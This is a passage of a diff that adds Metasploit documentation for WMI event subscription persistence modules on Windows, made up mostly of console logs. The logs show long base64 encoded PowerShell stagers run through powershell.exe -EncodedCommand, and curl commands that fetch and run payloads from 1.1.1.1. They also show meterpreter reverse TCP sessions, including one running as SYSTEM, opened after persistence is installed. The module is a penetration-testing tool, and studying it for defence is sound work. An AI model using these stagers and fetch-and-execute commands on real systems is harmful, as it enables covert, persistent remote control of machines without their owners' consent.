2AEQAcwAzAHAAUAAvAFAATwB0AHEAZAA5AFgAZABOAE0AVgA4AHkAagA0AHgARgA3AHQAcwA0ADQAYwBGAC8ATwBYAC8AQgB7ADIAfQAzADUAeABCACcAKwAnAC8ANgBVAGMAVABuAHEAKwBaAGEAMQBXAGYANgB7ADIAfQBQAEcAMABjAFQAcgBWAFQAbQArAFgAZABmAFQATABmAFUAMgBKADgALwBLAHgAMgBXAGQANQA3AHgARABIACcAKwAnADkAdABZACcAKwAnAEYAegBGADMAWgBsADIAWAArADgAWgA1ADEAaQBIAFkAYQBaADIAMQBvAGQANQBLADgATABDAEcAdAAzAE4ALwBzAGQANABkAG8AWQB1ADEANwBoAGEAZAAwAGYAWgAnACsAJwA1AHgAYgB1AGUAOQAzAGsASgBPAHMASAA0ACsAYwBaADEAeAAvADIAaAA3AHEAawB6ADgATgBIAHoALwBOAGYASwBlAGkANwAzACsAUQBIADYARQBIADEATwB2ADkAQgAxAHsAMQB9AHcANAA3ADcAJwArACcANwBwADUAWQB4ADEAMABEADcANQBTADEAcQBWADYAWAByAHAAdgBkAEYAbABuADUALwB7ADIAfQB6ADEAMwBMADEAKwBVAGoATAA4AFUATABmAG8AbAB2AFIAMAA1AHgAagB3AEMALwBDAG4AZgByAEYAaQBLAHYAbgBQAGQAWABoAHoAdgAzAG0AWABhACsAcwBtAC8ATwBKAE0AZgBwAGQALwBVAEIANAArAFcASgBkADAAOABSAHgAaAB0ADYARABYAHcATgA5AHUATQBrADYAcQArAE4AMQA3AHIAaABlAG8AaQB2AFIAUgA0ADcAegBqAEgAbQBtAGYAdQB1AGYANgBHAHoANABIADkAMABCAHYAdABHAEQAOABFADcAUABmAGQAYgAxAE0AcQBKAGUARAAzAEYAVABQAEoATAA3AFkAbwBDAFQASAA4AHkALwBhACsASwBmADUANQB7ADIAfQBhAC8AaABsADUAegBoAGgAJwArACcAUQBoACsAOQA5AHEANwBSAE8AKwArAEcANAB3AHsAMQB9ACsAOQBSAGMANABqADUAegBQAHcAQgBuAE8ALwB6ACcAKwAnADcAbgAyADUATwAwAEcATwB4AGYAcwAyADAAbAA1AEQAcgB1AHcARABoAHoAbAAnACsAJwBPAGwARQA4AEYAWQBlAGwANQA5AC8AcQBMAFMAOQBEADQAMgBPAEIALwB0AHoAegAzAHIAegAnACsAJwBPAC8AVwA1AFoAWgBWADIAMgBSAFMAKwBWAFAAbwBkADUAeQBYADAAYwB2AFoAMwB7ADEAJwArACcAfQBhAGMAdAA4AFIAMwA5AFQAdgBzAHcAcgBXAFUAOQA5AHkAZgBsAGsAUABqAHMAbgBUAHAANQByAHQAcAB3ADcAYwBXADcAQgAvAE4AQgBwADUAdABVAGUAYwA2AGgANABRAGYAYQBQAG0ATgA4ADUAVAAzAHIASAA0AHkAMwA2AFUARAB6ADcAKwBoAGIASABOAG4AbwBuADgANABOADEAUwBqADcAZgBNAGYANQBXADkARwBuAE8AVABkAEMARABQAGMAOAA3AFIAKwBUAEgANQA0AFAAWgBIADUAKwAvAHUAUAA1AEsAbgB3AGUAOQB7ADIAfQB7ADEAfQBmAHAAcQAwAGYAMwBUADgAOQBuAG4ASwBlAEUAZABlADIAbQB5AHUAYwBuADEAcQBsAHQAegAxAE4AUAA4AEwALwB5ADYAdgBNAHsAMQB9ADIAZAAwADMAMwBzAEYAZgAyAC8AcgBhADUAMgAwAGoANQBoADMAbQBNAHAAOQAzADIASgA1AGoAbgAyAC8ANQBuAEcAawB7ADEAfQBqAG8ANwA0AGIAewAyAH0AUgBmADUAUABQAEwAcAB5AGEAdQBOAFgARgBiADAAYwBlAEUAOAA2AGwAMQBXADAAVgBlAEYALwB7ADIAfQAzAHMAYwA0ADAAdgA3AGoATwAzAEQAZQB0AFEALwBRAGUAZQBEAFEATwBOADEAawAvAGMAawA2AFYATQBqADYAeQB2AG4ANQBzAHoAcgBjAFcAbQBiAGQATAA4ACsAbgBuAGYASwA0AFYAbgBxAHMAWAA5AEgALwA0AG0ASABPAFcAUABJADkANgBiAGwAQwBmAG0AcgB0AHYAUgBqADQAWABtAE8AQgAzADIAZgBCAGoAeAAvAFAATgBHAGUAYwBuAG8ANQBUAFAAawBkAGIAdwBpACsASwBUAHEAcQB4AEgAVgBIADgAUAAyAEQAMQB2AHoAaABzADkAegA3AGMAZABCADgALwBCACsAYgB5AGoAbQBXAC8AJwArACcAZgA4AHIAegBQAGMAeQBCADkATgBHAFgALwByAEYATwBaAGoAegB4AG4AegB2AEkANQBRAGUAbgA0AHYAeABDAG4AbgBYAFYAawBuADcAaABlAE4ALwAwADEAOQAyAFAATwAyAFkAUwBIAHsAMQB9ADkANwBYACsASgBIAGoALwAvAEsAdQBEAHkAUAB6AGkAZQBmAGsAdwB2AHIAMQA4AFAANABxAG0AcgBtAFYAdQBTAGkAZgBoAC8AcgA4AGMASQB5AGUARQBlADQAdgByAGMATQBlAHcAYQBIADEAYQBlAEkAOABxAEQAVABQADEAUABDAE0AMQB2AGsAZQBGADYAMwBjAEIAOQBxACsAZgAyAFQAZABaAEYANgBvADYAUQBzADkAKwA1ADEANABiADgALwAxAE0AVABxAFAAOABPAGkAWgA1ADEAZgB5AEoAYgA2ADQAbwBvACsAagBwADYAcQBpAFQAYgB6AFgANQBvADAAKwBkAHIAMAAyADUAMgBkAFAAMgBQAFAALwBuAGsAOQA5AHQAVAA3AGIAUgBsAHQANABkAFoAKwBZAEUAYQA4AG4AOQBqAEYAUABVAHcALwAnACsAJwB3AFQATABaAEgAZABwADAAUwA1AHgAdAB3AG4ATQAvAHQAegB2AE4AOABwAEgAVQB1ADQAMgB7ADEAfQAzAHoAdwBmAEUAUwAvAEUATgAvAEwAbwBGAGgAeQB2AHEAcgAvAFEANQA5AGgAewAxAH0AZQBrAGYAKwAvAFIAdgB6ACsAKwA0AGQAZgAvAHYAJwArACcAWgBoADkAcgBoADcAKwBQAEMAUAAvAHcATABZAHEAUABCAHkATwBSAHsAMgB9AHsAMQB9AHsAMQB9AHsAMQB9AHsAMAB9AHsAMAB9ACcAKQAtAGYAJwA9ACcALAAnAEEAJwAsACcAZwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 6416 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AcgBrAEkAVwBrAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgAnACsAJwBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMAewAxAH0AUgBEAFMANABwAHkAcwB4AEwAVgA4AGcASQA5AGcAcAAwAEwAUQByAFAAcQAxAHsAMAB9AHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgB5ADkASABWAGsAbwBRACcAKwAnAEEAQQBBAEEAPQAnACkALQBmACcARwAnACwAJwA3ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBmAHcAawBFAEsARgBNAEIAJwA7AA== -InputFormat None +[+] Persistence installed! +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.2931/WIN10PROLICENSE_20251122.2931.rc +``` + +Persistence Execution + +``` +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > execute -f calc.exe +Process 7596 created. +meterpreter > +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49759) at 2025-11-22 11:30:10 -0500 + +meterpreter > background +[*] Backgrounding session 1... +smsf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > background +[*] Backgrounding session 2... +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md new file mode 100644 index 0000000000000..48c2bd217ac81 --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md @@ -0,0 +1,134 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that +will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_uptime` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### SYSTEM_UPTIME_START + +System uptime to start the trigger (In seconds). Default: `240` (4min) + +### SYSTEM_UPTIME_END + +System uptime to end the trigger (In seconds). Default: `325` (5min 25sec) + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49703) at 2025-11-22 08:35:55 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_uptime +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > [*] Installing Persistence... +[*] Powershell command length: 6727 +[-] Compressed size: 14260 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14260 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMAJwArACcASQB7ADEAfQBGAG0AOABJAFcAawBDAHsAMQB9ADYAVwBaAHkAWABiAGIAWABIAGEARgBYAHkAVQB6AEoAMgB2AFYAZwBKAEwAMQBPADAANwBOAEQAawAwAHsAMgB9AHAAQwBpAHsAMgB9AEIAYgBZAEcAcwB6AEoAZwBGADkAaQBpAFoATgBxAFMATABkAGgANgArAHQAcgBmACcAKwAnAHYAcQBDAGsAeQBqAFMAYQBZAEkARwA2AHoAVwBuADIAMgBhAGYAQgBmADIAZgBmAG4AcgA0ACsAbgBMADcAZABIADcANwA5AC8ASgArAC8ALwAzADEAMgArAFAAbgBtAGgAKwBYAG0ANABlAHQAbQBlADMAZgA0ADkAMwBjAGQALwBWADIATQByAHUAdgB1AEoAagA1AC8AZQB2AGUAMwBkADkAZAAxAG4ASwBMAC8ARwBMAHUAbQBlAHgAdQBEAFkAVwB6AEsAYgBoAE8ARABNAHEAcQA2ACsAeABqADUAeAA2AGkAYQA3AGsAUAAwAE8AegBHAHAANAAwAFAAawBSAGUAegBxADcAbAAzAGsAVwBlAHgARAB6ADAAOQAxAGoASwBJADcAaQBYAHcAUgArAHkAWgArAFIAdgBhAFIAZgBUADkANAAxADcANQBPAGYASQBwAFkATgBOADIALwBZAGwAQwBrADkAWABrAG4AYgB1AHIAdQBOAGUAdgAwAG4ASABQAFAAKwBiAHgAdAAyACcAKwAnAFoAMQA1AFgAOQBrADkAOAB0AHcAaABWADMAWQBWADYANwBMADcAUABqADUAMQBZAHQANQAwAHYAMABaACsANAB2ADIAVwBmAGMATgBnAC8AeABHADUATwA2AHoAZgBsAHYARQByAHMAcQBQAFcAOABTAHgAaQAyADMAUgAvAHgAaQBEAFMAKwBiAHAAZgA2ADcANgBqAHoANwBiAG0ALwA3AHMANAAxAEgAbwBmAFcATAA0AE8AZQB1AHYAYwBMADgAZwAzAGkAdgAvAFAAdgBSADMAVwAvAGUAewAyAH0AZQAzAGYAdABYADkASwAzADMAbgAxAGEAdgBuADkAagByAEoAcgBwAGIAZgBqACsAVQAzAFcAZgBPADgALwBwAFAAVgAxAEUAMgAzAGEAJwArACcAZgBJAHIAMgBKAHYAZQBZAGYAcwAyADAAZgB2AEoATAB0ADMAYwA5ADYAdABUAHoAYgBrAG4ARwBmAE8ARwA5AGYAUgBlAFQAMwAvAEsATAAyADYAMwA1AEkALwBKAFAAKwBuAFgAYwB4AEMALwA1AGYAZQBzADcATABiAGoAYQB4AEMAegBpAHYAawBYAE8ASgBQADIAYQBjAHMANAB6AEwANgB1ADEAagBWADMAUwBwADYAdwA3AGgAcAB7ADIAfQB2AHMAZgA0AHgAcAA5ADkAWAA1AG8ANABrADgATQBPAGoAcABIACcAKwAnADkALwBjAEsALwBWADkAKwA2AFoAZgBJAGUAYwAyADUAZQBuAFoAagA4AEIAaABGADIAZgAwAHYANwBMAGgAcAB1AHIAKwBqAGQANAB4AE4AZABQACsAQgBIAGYAWAArADIAWAA3ADEAZgBSADkAagBWAHMAZABEADUASABYAE0ANgAyADcAQgAvAGcAMQA2AFoANgBkAFkAbAB0AG8AbgBQAFYAWQBoACsAYgBOAEgANQBGADAAaQBsACsAegBYAGIAKwAwAHoAagAzADYATgBuAEQALwB7ADIAfQBZAHgASABvAFgAOABhAG8AaQBhAGYAbwBMAGYARABqAEYAOQBhAHYAdQBUAGQAcgBzAE4AKwBUAC8AUgB6AGQAaQAvAGoAMABNAFkAcgBvAC8AaQBmADYALwBHAC8AJwArACcASgBNACsATgA1AEcAYgAxAGQAagBNAHQAbwAyAEYAOAAxAHkARABXAE0AZQBSAG4AUAArAEUALwAyAFgAJwArACcARQBWAGUAYwBmACsAewAxAH0AKwB3AC8AWQBSACsAOQB6AC8AeQA2AGMAaAArAHkAbQBwACsAeAAxAGkAWgA0ADcANwBDADkANwBqADEAcgA3ADYAWABlAGQAVQA0AEwALwBpAHgAaQBjAHcATABYADgAVQBNAGwAdgAyAEQAJwArACcAdABpAGkAZAA5ADAAMwBqAFgAMwBhAHAALwB3ADIATABUAG4AVwBxADgAeABkAHAAWABjADAAbgBjAFUAZQBZAFAAZABWACsAQgBpAHoAWAByAGgAVABuADcALwBDADMAdQBNAEcAdgAxAGYAOABzADIAeAB3ADIARABCAC8AYwAvAG8ATwB7ADIAfQBuAFoAVgArAGQAUAB5AG4AaQBQAFgAVwBaAE4AOQB4ADUAOQBKADIAVgAzAGoAUgA4ADMAbwBmAFgAOQBLAG8AcABhAGQAdABaADcAdwB0AHQAQwArAGsAcwBQADcAZABjADUAaQB0AGMATQB2ADIAZgBJAG8AZQBmAFIAZgBxAHkASgBjACsAUAA2AFMALwBSAHEAJwArACcANAB1AEkAMwA5AGkAdwBjAFAAdwB2ADUAUwBYAGkAUgAvADQAbwBhADMARgBUAHkAaAArADcAWABlAGYAdABhADkAOABrAHUAMgBuAGYATABlAFoASQA3AHsAMQB9ADgAOQBUADEAZwBrAHYAdwBzAGMASAA5AEYATQA4ADIATwA2AHIAMABQADAANgBYAC8ANABzADAAVgBQACsAVwBFAFIAUABkAGcAbgB4AGsAZQAyAHIALwBkAGsAQwBmAGIANgBtAC8AYgBKAG4AVgBuAFAAUABlADkAYgBKAEgAdwAzACsAbABQADMALwBjAEcANQBWAHkAeQA2ADYAZAAwAHIAYwBTAHIANgAxAC8AVgB6AEYAQgByAC8ASwBIADQANABmAHkAYgBNAE0ANwBGAEYAagAzAHoALwBvAE0ANgB2AFAAdQB7ADEAfQBuADcAegA3AC8AcgAvAGgAWAArADcAeABrAFgAZgA5AGcAdgB1ADQAMQBmAC8ARQA4ADgAMQBJAG8ASAAzAGIAdgBEAHIAOQBvAC8AUgByADUAZQAnACsAJwBnAEwAZgBuADYAQwArAHcAWgB3AGYANwArAC8ALwBuAGYAZgB5AC8AVQBYAHkAbQArAEwAcQB7ADEAfQBiAHkAcgBiAHUANABSAG4ARgB0AGgAOQB7ADEAfQBuAC8ASwAzACcAKwAnAHkAWAA4AEMATgA1ADkAMwBnAGsANwBGAGUAbAA4ADIAVQB0AHkAUwB2AC8AMwBQAFAAZgBZAHsAMgB9AGYAYQBwAHcATABIADkARgBJADUAUAArACcAKwAnAGYARgBFAC8ARQAyAEoARQA4AG0AMwBhAHkAUwBIADkATgBnADYATABoAGIANABZAGUASgAzAC8ARABMAHsAMQB9AHoAZwBtAHYAUwAzAEIASABuAEQAVAB5AHYALwBDADkAewAyAH0AbgAvADkATAB2AHoAYwBzADIAKwBKAGYATQBTAHoAZQBmADUARQBuAE4AKwBDAFYALwBsAHAAdwA3ADEANwA0AHkAYgB3AHkAeQAvAGUAbAB5AEYAOQBsAFUALwAwAC8AeQBmADgAVQA4AEYAUAAwAG4AZQBHAFAAbQBjADcAUwByADYAMQA3AFcAMwBlACsAOQBMAGEALwBSAHoASABEAGYAaABkADEAKwBTAHIASQBYAEgAKwBDADcAMABMAHgAeQBWADIARgBSADgAawBmAGUAKwAnACsAJwBSACsANABaADQAeQBhADYAUwBmAG8AcQBIAGMALwB4AHAALwA0AHIAegA5AHUAQgBMAGYAJwArACcAaABOACsAZgA4AE4AbgBlAC8AQwBZAFoAYwBpAFgAUgBkADkAJwArACcAMgB2AE8AUgA1ADMAbABjAFMAZAA3AEsARAA5AEgAcQB3AEgAUgByADkAbgAzAGkARQA1ADQAUwBUAHUAYwA4ADkAdwBpAC8AUAArAEYAdgBuAC8ASAByAFIANgAwAFcALwBZAHgAegBnAHMAMgBTAG4AbABlAE0ASQBIAEMAcwAvAGoAVwB2ADQAbwAwACcAKwAnAHAANAB4AGwANwBjAEkANwA5AFgAOABLAGYAawBLAE4AcgA4AHMAMABaAHUANgBiAE4AOAA1AGUAOABiADEAcAAvAGwARgBLAC8AZQBZAEwAZQBDAE8ATwBCAGMAZQBEAG4AeABxAHYAJwArACcATwBNADgAawBFAEQAagBxAFoAbAB3AHMAYwBLAGYAKwBUAEUAcAAzADcAMwBlAHQAbAB6AFUAQwBmACsAeQBCACsAeABTADAASAA4ADcAWgAyAEgASAB1AEgAWgBFAC8AbwB2AHcARABQADUATgBoAFMAWAA0AG4AdgBaACsAWQBLADgAdABDAE8AZgBDAFAAZQB5ADAAMQBmAHMAcwBJAFQAWABrAHoAMwBXAE0AYgBDAGUAZgA2AEcAWABuAGsAZgA0AGQATwA1ADgAWgBoADYAMgBuAEYAdgB5AGoAdQBTAGEAdwArAGQAdgAvAEwAJwArACcAWQB3AGYAOABnAC8ANQBMAGwAKwBtAGYAdwBtADMATQAxADgAZgA0AFgAOAB7ADEAfQArAHsAMgB9ACsAcgB6ACcAKwAnAGMATwBKAFoAZgAwAHYAcgBkAC8AaQBNAE8AWAAvAEwAWAB7ADEAfQByAGkAUAB1AG0AWQBGAGYANABxAEkAawBMADIAYQB2AE8ARQBIAHYAeABDAE0AbABkAGwAYwBlACsAbwAxAGQAMQA4AGkAZAB1AGEANQA0AE0ATwArAFoARgB5AHoASABHAHYAdgBxAG4AcAA3AHgAMABkAHAANwAxAEMAewAyAH0ANQBIAFYAOAA2AGYAMgBPADUATwAvAGgAegBpAFoAMABXADUAcQBXAGEAZgBSAFAAeQA5AEkAVAA4AHcAWABuAHcAZQB7ADIAfQA2ACsANABiAGMAcgA1AFYAZQA5AEQAMgB6AFgASQArAGUAcwBJAHYASAB3AG8AWAB6AEIAewAyAH0AWQBmADkAYwArAFIAUgBYAEoANwAxADAAUABvAFAATABZADkAZQBZAEY